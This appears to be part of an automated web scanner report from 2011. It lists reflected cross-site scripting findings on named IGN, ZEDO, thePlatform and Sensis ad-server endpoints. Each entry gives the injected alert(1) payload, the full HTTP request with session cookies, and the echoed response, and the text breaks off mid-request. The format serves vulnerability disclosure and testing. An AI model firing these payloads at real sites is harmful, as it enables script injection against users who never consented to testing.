1.32. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corp.ign.com
Path:	/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1055c"-alert(1)-"1670b2a4751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /contact/?1055c"-alert(1)-"1670b2a4751=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14757

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/contact/?1055c"-alert(1)-"1670b2a4751=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.33. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://corp.ign.com
Path:	/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 267cd"><script>alert(1)</script>ec564ca3669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?267cd"><script>alert(1)</script>ec564ca3669=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:29 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14786

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/contact/?267cd"><script>alert(1)</script>ec564ca3669=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.34. http://d7.zedo.com/jsc/d3/fl.js [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70eed'%3balert(1)//04d7e844b73 was submitted in the p parameter. This input was echoed as 70eed';alert(1)//04d7e844b73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jsc/d3/fl.js?n=1302&c=174&r=21&d=31&w=298&h=70&p=7105cu70eed'%3balert(1)//04d7e844b73&z=0.2418893207795918 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121A059CF4J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q0704DB43000058/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0; ZFFAbh=977B826,20|121_977#365; ZFFBbh=1006B826,20|121_977#0; ZCBC=1; FFgeo=5386156; FFcat=1302,69,9:1302,197,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "2202213-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=781
Expires: Tue, 04 Oct 2011 20:23:50 GMT
Date: Tue, 04 Oct 2011 20:10:49 GMT
Content-Length: 2265
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;

...[SNIP]...
3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1317732010%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1249847%3Bh%3D1249740%3Bk=http://howlifeworks.com/shopping/penny_auction_solo/?AG_ID=991&cid=7105cu70eed';alert(1)//04d7e844b73">
...[SNIP]...

1.35. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.theplatform.com
Path:	/s/fox.com/JV5bOqASsrxR

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c007e<script>alert(1)</script>3c5b4edbedc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2011 20:19:16 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1428
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR. Reason:
<pre>
...[SNIP]...

1.36. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [feed parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.theplatform.com
Path:	/s/fox.com/JV5bOqASsrxR

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload db47d<script>alert(1)</script>0e109b9d114 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clipsdb47d<script>alert(1)</script>0e109b9d114&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:19:13 GMT
Access-Control-Allow-Origin: *
Content-Type: application/smil; charset=UTF-8
X-Cache: HIT from link.theplatform.com:80
Cache-Control: max-age=5
Connection: close
Server: Jetty(6.1.19)

<smil xmlns="http://www.w3.org/2005/SMIL21/Language">
<head>
</head>
<body>
<seq>
<switch>
<video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/289/GLEE_303_First_Look_Asian_F_2500.mp4?hdnea=ip=50.
...[SNIP]...
<param name="trackingData" value="b=333085|cc=US|ci=1|cid=1343887|d=1317759553892|l=144597|p=Homepage Player - Network HP Featured Clipsdb47d<script>alert(1)</script>0e109b9d114|rc=TX|rid=1344184"/>
...[SNIP]...

1.37. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [format parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://link.theplatform.com
Path:	/s/fox.com/JV5bOqASsrxR

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 8fa14<script>alert(1)</script>933a798a5b1 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL8fa14<script>alert(1)</script>933a798a5b1&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Tue, 04 Oct 2011 20:19:14 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Unsupported Metafile Format",
   "description": "'SMIL8fa14<script>alert(1)</script>933a798a5b1' is not a supported metafile format.",
   "isException": true,
   "exception": "UnsupportedFormat",
   "responseCode": "400"
}

1.38. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6f"><script>alert(1)</script>5e9e856ebbd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver2eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:24 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d38000000002eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.39. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44942"><script>alert(1)</script>1a35826ae0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:27 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 414
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de975"><script>alert(1)</script>05535384c68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:19 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 418
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.41. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9aaa"><script>alert(1)</script>8613fae918b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:42 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000f9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.42. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539a8"><script>alert(1)</script>743c7d9af22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:45 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f256"><script>alert(1)</script>4a926be100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:37 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 417
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.44. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6904"><script>alert(1)</script>e367996f762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
